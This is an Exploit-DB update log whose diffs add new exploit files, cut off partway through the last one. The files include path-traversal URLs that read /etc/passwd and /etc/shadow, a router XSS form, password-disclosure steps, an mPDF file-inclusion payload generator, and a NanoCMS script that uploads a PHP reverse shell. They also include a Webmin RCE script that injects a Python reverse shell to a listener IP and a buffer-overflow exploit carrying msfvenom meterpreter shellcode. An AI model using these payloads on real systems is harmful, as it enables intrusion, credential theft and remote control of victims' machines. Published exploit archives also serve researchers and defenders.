DB: 2022-08-02

19 changes to exploits/shellcodes

Omnia MPX 1.5.0+r1 - Path Traversal
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
Wavlink WN533A8 - Cross-Site Scripting (XSS)
Wavlink WN530HG4 - Password Disclosure
Wavlink WN533A8 - Password Disclosure
WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
WordPress Plugin Duplicator 1.4.7 - Information Disclosure
CuteEditor for PHP 6.6 - Directory Traversal
mPDF 7.0 - Local File Inclusion
NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)

exploits/hardware/remote/50996.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
+# Date: 24/7/2022
+# Exploit Author: Momen Eldawakhly (Cyber Guy)
+# Vendor Homepage: https://www.telosalliance.com/
+# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
+# Version: 1.5.0+r1
+# Tested on: MacOS
+# PoC:
+http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
+http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow
+
+User Database:
+http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json

exploits/hardware/webapps/50989.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: M33A8.V5030.190716
+# Vendor home page : wavlink.com
+# Authentication Required: No
+# CVE : CVE-2022-34048
+# Tested on: Windows
+
+# Poc code
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
+      <input type="hidden" name="newUI" value="1" />
+      <input type="hidden" name="page" value="login" />
+      <input type="hidden" name="username" value="admin" />
+      <input type="hidden" name="langChange" value="0" />
+     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
+      <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
+      <input type="hidden" name="homepage" value="main&#46;shtml" />
+      <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
+      <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
+      <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
+      <input type="hidden" name="key" value="M94947765" />
+      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
+      <input type="hidden" name="lang&#95;select" value="en" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/hardware/webapps/50990.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Wavlink WN533A8 - Password Disclosure
+# Date: 2022-06-12
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: M33A8.V5030.190716
+# Vendor home page : wavlink.com
+# Authentication Required: No
+# CVE : CVE-2022-34046
+# Tested on: Windows
+
+# Exploit
+
+view-source:http://IP_ADDRESS/sysinit.shtml
+search for var syspasswd="
+you will find the username and the password

exploits/hardware/webapps/50991.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Wavlink WN530HG4 - Password Disclosure
+# Date: 2022-06-12
+# Exploit Author: Ahmed Alroky
+# Author Company : AIactive
+# Version: M30HG4.V5030.191116
+# Vendor home page : wavlink.com
+# Authentication Required: No
+# CVE : CVE-2022-34047
+# Tested on: Windows
+
+# Exploit
+
+view-source:http://IP_address/set_safety.shtml?r=52300
+search for var syspasswd="
+you will find the username and the password

exploits/linux/webapps/50998.py

@@ -0,0 +1,81 @@
+# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-07-25
+# Exploit Author: Emir Polat
+# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
+# Vendor Homepage: https://www.webmin.com/
+# Software Link: https://www.webmin.com/download.html
+# Version: < 1.997
+# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
+# CVE: CVE-2022-36446
+
+import argparse
+import requests
+from bs4 import BeautifulSoup
+
+def login(args):
+    global session
+    global sysUser
+
+    session = requests.Session()
+    loginUrl = f"{args.target}:10000/session_login.cgi"
+    infoUrl = f"{args.target}:10000/sysinfo.cgi"
+
+    username = args.username
+    password = args.password
+    data = {'user': username, 'pass': password}
+
+    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
+    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})
+
+    bs = BeautifulSoup(sysInfo.text, 'html.parser')
+    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]
+
+    if sysUser:
+        return True
+    else:
+        return False
+
+def exploit(args):
+    payload = f"""
+    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
+    os.dup2(s.fileno(),0);
+    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
+    """
+
+    updateUrl = f"{args.target}:10000/package-updates"
+    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"
+
+    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}
+
+    if login(args):
+        print("[+] Successfully Logged In !")
+        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
+        print(f"[+] User Found  => {sysUser[0]}")
+
+        res = session.get(updateUrl)
+        bs = BeautifulSoup(res.text, 'html.parser')
+
+        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
+
+        if updateAccess[0] == "package-updates":
+            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
+            print(f"[+] Exploit starting ... ")
+            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")
+
+            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
+            session.post(exploitUrl, data=exploitData)
+        else:
+            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
+    else:
+        print("[-] Login Failed !")
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
+    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
+    parser.add_argument('-u', '--username', help='Username For Login', required=True)
+    parser.add_argument('-p', '--password', help='Password For Login', required=True)
+    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
+    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
+    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
+    args = parser.parse_args()
+    exploit(args)

exploits/php/webapps/50075.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi)
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date 30.06.2021
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html

exploits/php/webapps/50076.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Online Voting System 1.0 - Remote Code Execution (Authenticated)
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date 30.06.2021
 # Vendor Homepage: https://www.sourcecodester.com/
 # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html

exploits/php/webapps/50992.txt

@@ -0,0 +1,22 @@
+# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
+# Google Dork: N/A
+# Date: 07.27.2022
+# Exploit Author: SecuriTrust
+# Vendor Homepage: https://snapcreek.com/
+# Software Link: https://wordpress.org/plugins/duplicator/
+# Version: < 1.4.7
+# Tested on: Linux, Windows
+# CVE : CVE-2022-2551
+# Reference: https://securitrust.fr
+# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551
+
+#Product:
+WordPress Plugin Duplicator < 1.4.7
+
+#Vulnerability:
+1-It allows an attacker to download the backup file.
+
+#Proof-Of-Concept:
+1-Backup download.
+The backup file can be downloaded using the "is_daws" parameter.
+http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

exploits/php/webapps/50993.txt

@@ -0,0 +1,22 @@
+# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure
+# Google Dork: N/A
+# Date: 07.27.2022
+# Exploit Author: SecuriTrust
+# Vendor Homepage: https://snapcreek.com/
+# Software Link: https://wordpress.org/plugins/duplicator/
+# Version: <= 1.4.7
+# Tested on: Linux, Windows
+# CVE : CVE-2022-2552
+# Reference: https://securitrust.fr
+# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552
+
+#Product:
+WordPress Plugin Duplicator <= 1.4.7
+
+#Vulnerability:
+1-Some system information may be disclosure.
+
+#Proof-Of-Concept:
+1-System information.
+Some system information is obtained using the "view" parameter.
+http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

exploits/php/webapps/50994.txt

@@ -0,0 +1,82 @@
+# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
+# Google Dork: N/A
+# Date: November 17th, 2021
+# Exploit Author: Stefan Hesselman
+# Vendor Homepage: http://phphtmledit.com/
+# Software Link: http://phphtmledit.com/download/phphtmledit.zip
+# Version: 6.6
+# Tested on: Windows Server 2019
+# CVE : N/A
+
+There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.
+
+File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121
+
+Vulnerable code:
+[SNIP]
+	function ServerMapPath($input_path,$absolute_path,$virtual_path)
+	{
+	  if($absolute_path!="")
+	  {
+		return $absolute_path.str_ireplace($virtual_path,"",$input_path);
+	  }
+	  else
+	  {
+		if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
+		{
+if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {
+	$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
+}
+if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {
+  $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
+}
+				return $_SERVER["DOCUMENT_ROOT"].$input_path;
+		}
+		else
+		{
+			return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;
+		}
+	  }
+	}
+[SNIP]
+
+ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.
+
+File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56
+
+Vulnerable function (renamefile, line 57):
+[SNIP]
+switch ($action)
+{
+[SNIP]
+	case "renamefile":
+		rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
+		print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
+		break;
+[SNIP]
+
+$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:
+
+C:\Inetpub\wwwroot\..\..\..\poc.html
+
+Final result: writes poc.html to the webroot.
+
+STEPS:
+
+1. Create a poc.html file (XSS PoC will do).
+
+<HTML>
+<title>Path Traversal PoC</title>
+<BODY>
+<h1>PoC</h1>
+<script>alert('directory traversal');</script>
+</BODY>
+</HTML>
+
+2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
+3. Select poc.html and select "Rename File".
+4. Click on the pencil icon to the right of the poc.html file.
+5. Rename file to "..\..\..\poc.html".
+6. Press OK. poc.html is written three directories up.
+
+This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.

exploits/php/webapps/50995.py

@@ -0,0 +1,43 @@
+# Exploit Title: mPDF 7.0 - Local File Inclusion
+# Google Dork: N/A
+# Date: 2022-07-23
+# Exploit Author: Musyoka Ian
+# Vendor Homepage: https://mpdf.github.io/
+# Software Link: https://mpdf.github.io/
+# Version: CuteNews
+# Tested on: Ubuntu 20.04, mPDF 7.0.x
+# CVE: N/A
+
+#!/usr/bin/env python3
+
+from urllib.parse import quote
+from cmd import Cmd
+from base64 import b64encode
+
+class Terminal(Cmd):
+    prompt = "\nFile >> "
+    def default(self, args):
+        payload_gen(args)
+def banner():
+    banner = """                          _____  _____  ______   ______ ___  __   __                  _       _ _
+                         |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |
+               _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_
+               | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|
+               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_
+               |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|
+                                                                               | |
+                                                                               |_|   """
+    print(banner)
+def payload_gen(fname):
+    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
+    encoded_payload = quote(payload)
+    print("[+] Replace the content with the payload below")
+
+    print(f"Url encoded payload:\n{encoded_payload}\n")
+    base64enc = b64encode(encoded_payload.encode())
+    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
+if __name__ == ("__main__"):
+    banner()
+    print("Enter Filename eg. /etc/passwd")
+    terminal= Terminal()
+    terminal.cmdloop()

exploits/php/webapps/50997.py

@@ -0,0 +1,328 @@
+# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-07-26
+# Exploit Auuthor: p1ckzi
+# Vendor Homepage: https://github.com/kalyan02/NanoCMS
+# Version: NanoCMS v0.4
+# Tested on: Linux Mint 20.3
+# CVE: N/A
+#
+# Description:
+# this script uploads a php reverse shell to the target.
+# NanoCMS does not sanitise the data of an authenticated user while creating
+# webpages. pages are saved with .php extensions by default, allowing an
+# authenticated attacker access to the underlying system:
+# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt
+
+#!/usr/bin/env python3
+
+import argparse
+import bs4
+import errno
+import re
+import requests
+import secrets
+import sys
+
+
+def arguments():
+    parser = argparse.ArgumentParser(
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        description=f"{sys.argv[0]} exploits authenticated file upload"
+        "\nand remote code execution in NanoCMS v0.4",
+        epilog=f"examples:"
+        f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"
+        f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"
+        f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"
+    )
+    parser.add_argument(
+        "address", help="schema/ip/hostname, port, sub-directories"
+        " to the vulnerable NanoCMS server"
+    )
+    parser.add_argument(
+        "file", help="php file to upload"
+    )
+    parser.add_argument(
+        "-u", "--user", help="username", default="admin"
+    )
+    parser.add_argument(
+        "-p", "--passwd", help="password", default="demo"
+    )
+    parser.add_argument(
+        "-e", "--execute", help="attempts to make a request to the uploaded"
+        " file (more useful if uploading a reverse shell)",
+        action="store_true", default=False
+    )
+    parser.add_argument(
+        "-a", "--accessible", help="turns off features"
+        " which may negatively affect screen readers",
+        action="store_true", default=False
+    )
+    parser.add_argument(
+        "-n", "--no-colour", help="removes colour output",
+        action="store_true", default=False
+    )
+    arguments.option = parser.parse_args()
+
+
+# settings for terminal output defined by user in term_settings().
+class settings():
+    # colours.
+    c0 = ""
+    c1 = ""
+    c2 = ""
+
+    # information boxes.
+    i1 = ""
+    i2 = ""
+    i3 = ""
+    i4 = ""
+
+
+# checks for terminal setting flags supplied by arguments().
+def term_settings():
+    if arguments.option.accessible:
+        small_banner()
+    elif arguments.option.no_colour:
+        settings.i1 = "[+] "
+        settings.i2 = "[!] "
+        settings.i3 = "[i] "
+        settings.i4 = "$ "
+        banner()
+    elif not arguments.option.accessible or arguments.option.no_colour:
+        settings.c0 = "\u001b[0m"       # reset.
+        settings.c1 = "\u001b[38;5;1m"  # red.
+        settings.c2 = "\u001b[38;5;2m"  # green.
+        settings.i1 = "[+] "
+        settings.i2 = "[!] "
+        settings.i3 = "[i] "
+        settings.i4 = "$ "
+        banner()
+    else:
+        print("something went horribly wrong!")
+        sys.exit()
+
+
+# default terminal banner (looks prettier when run lol)
+def banner():
+    print(
+        "\n                                                  .__           .__"
+        "  .__   "
+        "\n  ____ _____    ____   ____   ____   _____   _____|  |__   ____ |  "
+        "| |  |  "
+        "\n /    \\__   \\  /    \\ /  _ \\_/ ___\\ /     \\ /  ___/  |  \\_/ "
+        "__ \\|  | |  |  "
+        "\n|   |  \\/ __ \\|   |  (  <_> )  \\___|  Y Y  \\___  \\|   Y  \\  _"
+        "__/|  |_|  |__"
+        "\n|___|  (____  /___|  /\\____/ \\___  >__|_|  /____  >___|  /\\___  "
+        ">____/____/"
+        "\n     \\/     \\/     \\/            \\/      \\/     \\/     \\/   "
+        "  \\/"
+    )
+
+
+def small_banner():
+    print(
+        f"{sys.argv[0]}"
+        "\nNanoCMS authenticated file upload and rce..."
+    )
+
+
+# appends a '/' if not supplied at the end of the address.
+def address_check(address):
+    check = re.search('/$', address)
+    if check is not None:
+        print('')
+    else:
+        arguments.option.address += "/"
+
+
+# creates a new filename for each upload.
+# errors occur if the filename is the same as a previously uploaded one.
+def random_filename():
+    random_filename.name = secrets.token_hex(4)
+
+
+# note: after a successful login, credentials are saved, so further reuse
+# of the script will most likely not require correct credentials.
+def login(address, user, passwd):
+    post_header = {
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
+        "Gecko/20100101 Firefox/91.0",
+        "Accept": "text/html,application/xhtml+xml,"
+        "application/xml;q=0.9,image/webp,*/*;q=0.8",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate",
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": "",
+        "Connection": "close",
+        "Referer": f"{arguments.option.address}data/nanoadmin.php",
+        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
+        "Upgrade-Insecure-Requests": "1",
+    }
+    post_data = {
+        "user": f"{user}",
+        "pass": f"{passwd}"
+    }
+
+    url_request = requests.post(
+        address + 'data/nanoadmin.php?',
+        headers=post_header,
+        data=post_data,
+        verify=False,
+        timeout=30
+    )
+    signin_error = url_request.text
+    if 'Error : wrong Username or Password' in signin_error:
+        print(
+            f"{settings.c1}{settings.i2}could "
+            f"sign in with {arguments.option.user}/"
+            f"{arguments.option.passwd}.{settings.c0}"
+        )
+        sys.exit(1)
+    else:
+        print(
+            f"{settings.c2}{settings.i1}logged in successfully."
+            f"{settings.c0}"
+        )
+
+
+def exploit(address, file, name):
+    with open(arguments.option.file, 'r') as file:
+        file_contents = file.read().rstrip()
+    post_header = {
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
+        "Gecko/20100101 Firefox/91.0",
+        "Accept": "text/html,application/xhtml+xml,"
+        "application/xml;q=0.9,image/webp,*/*;q=0.8",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate",
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": "",
+        "Connection": "close",
+        "Referer": f"{arguments.option.address}data/nanoadmin.php?action="
+        "addpage",
+        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
+        "Upgrade-Insecure-Requests": "1",
+    }
+
+    post_data = {
+        "title": f"{random_filename.name}",
+        "save": "Add Page",
+        "check_sidebar": "sidebar",
+        "content": f"{file_contents}"
+    }
+
+    url_request = requests.post(
+        address + 'data/nanoadmin.php?action=addpage',
+        headers=post_header,
+        data=post_data,
+        verify=False,
+        timeout=30
+    )
+    if url_request.status_code == 404:
+        print(
+            f"{settings.c1}{settings.i2}{arguments.option.address} could "
+            f"not be uploaded.{settings.c0}"
+        )
+        sys.exit(1)
+    else:
+        print(
+            f"{settings.c2}{settings.i1}file posted."
+            f"{settings.c0}"
+        )
+
+    print(
+        f"{settings.i3}if successful, file location should be at:"
+        f"\n{address}data/pages/{random_filename.name}.php"
+    )
+
+
+def execute(address, file, name):
+    print(
+            f"{settings.i3}making web request to uploaded file."
+    )
+    print(
+            f"{settings.i3}check listener if reverse shell uploaded."
+        )
+    url_request = requests.get(
+        address + f'data/pages/{random_filename.name}.php',
+        verify=False
+    )
+    if url_request.status_code == 404:
+        print(
+            f"{settings.c1}{settings.i2}{arguments.option.file} could "
+            f"not be found."
+            f"\n{settings.i2}antivirus may be blocking your upload."
+            f"{settings.c0}"
+        )
+    else:
+        sys.exit()
+
+
+def main():
+    try:
+        arguments()
+        term_settings()
+        address_check(arguments.option.address)
+        random_filename()
+        if arguments.option.execute:
+            login(
+                arguments.option.address,
+                arguments.option.user,
+                arguments.option.passwd
+            )
+            exploit(
+                arguments.option.address,
+                arguments.option.file,
+                random_filename.name,
+            )
+            execute(
+                arguments.option.address,
+                arguments.option.file,
+                random_filename.name,
+            )
+        else:
+            login(
+                arguments.option.address,
+                arguments.option.user,
+                arguments.option.passwd
+            )
+            exploit(
+                arguments.option.address,
+                arguments.option.file,
+                random_filename.name,
+            )
+    except KeyboardInterrupt:
+        print(f"\n{settings.i3}quitting.")
+        sys.exit()
+    except requests.exceptions.Timeout:
+        print(
+            f"{settings.c1}{settings.i2}the request timed out "
+            f"while attempting to connect.{settings.c0}"
+        )
+        sys.exit()
+    except requests.ConnectionError:
+        print(
+            f"{settings.c1}{settings.i2}could not connect "
+            f"to {arguments.option.address}{settings.c0}"
+        )
+        sys.exit()
+    except FileNotFoundError:
+        print(
+            f"{settings.c1}{settings.i2}{arguments.option.file} "
+            f"could not be found.{settings.c0}"
+        )
+    except (
+        requests.exceptions.MissingSchema,
+        requests.exceptions.InvalidURL,
+        requests.exceptions.InvalidSchema
+    ):
+        print(
+            f"{settings.c1}{settings.i2}a valid schema and address "
+            f"must be supplied.{settings.c0}"
+        )
+        sys.exit()
+
+
+if __name__ == "__main__":
+    main()

exploits/windows/local/50047.txt

@@ -1,9 +1,9 @@
 # Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date: 17.06.2021
 # Version: Remote Mouse 3.008
 # Tested on: Windows 10 Pro Version 21H1
-# Reference: https://leobreaker1411.github.io/blog/cve-2021-35448
+# Reference: https://deathflash1411.github.io/blog/cve-2021-35448
 # CVE: CVE-2021-35448
 
 Steps to reproduce:

exploits/windows/local/50130.py

@@ -1,9 +1,9 @@
 # Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date: 12.07.2021
 # Version: Argus Surveillance DVR 4.0
 # Tested on: Windows 7 x86 (Build 7601) & Windows 10
-# Reference: https://leobreaker1411.github.io/blog/dvr4-hash-crack
+# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack
 
 # Note: Argus Surveillance DVR 4.0 configuration is present in
 # C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

exploits/windows/local/50258.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Remote Mouse 4.002 - Unquoted Service Path
-# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date: 03.09.2021
 # Software Link: https://www.remotemouse.net/downloads/RemoteMouse.exe
 # Vendor Homepage: https://www.remotemouse.net/

exploits/windows/local/50261.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
-# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date: 03.09.2021
 # Version: Argus Surveillance DVR 4.0
 # Tested on: Windows 10

exploits/windows/local/50273.txt

@@ -1,5 +1,5 @@
 # Exploit Title: Active WebCam 11.5 - Unquoted Service Path
-# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Date: 09.09.2021
 # Software Link: https://www.techspot.com/downloads/175-active-webcam.html
 # Vendor Homepage: https://www.pysoft.com/

exploits/windows/local/50337.ps1

@@ -1,5 +1,5 @@
 # Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation
-# Exploit Author: Salman Asad (@LeoBreaker1411 / deathflash1411)
+# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
 # Original Author: Maximilian Barz (@S1lkys)
 # Date: 27/09/2021
 # Vendor Homepage: https://www.apachefriends.org

exploits/windows/remote/50999.py

@@ -0,0 +1,64 @@
+# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
+# Exploit Author: r00tpgp @ http://www.r00tpgp.com
+# Usage: python easychat-exploit.py <victim-ip> <port>
+# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
+# CVE: CVE-2004-2466
+# Installer: http://www.echatserver.com/
+# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
+
+#!/usr/bin/python
+
+import sys, socket, time
+
+host = sys.argv[1] # Recieve IP from user
+port = int(sys.argv[2]) # Recieve Port from user
+
+#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"
+buf =  ""
+buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"
+buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"
+buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"
+buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"
+buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"
+buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"
+buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"
+buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"
+buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"
+buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"
+buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"
+buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"
+buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"
+buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"
+buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"
+buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"
+buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"
+buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"
+buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"
+buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"
+buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"
+buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"
+buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"
+buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"
+buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"
+buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"
+buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"
+buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"
+
+junk = "A"*217
+nseh = "\xeb\x06\x90\x90" # short jump 6 bytes
+seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL
+nops = "\x90"*16
+
+header = (
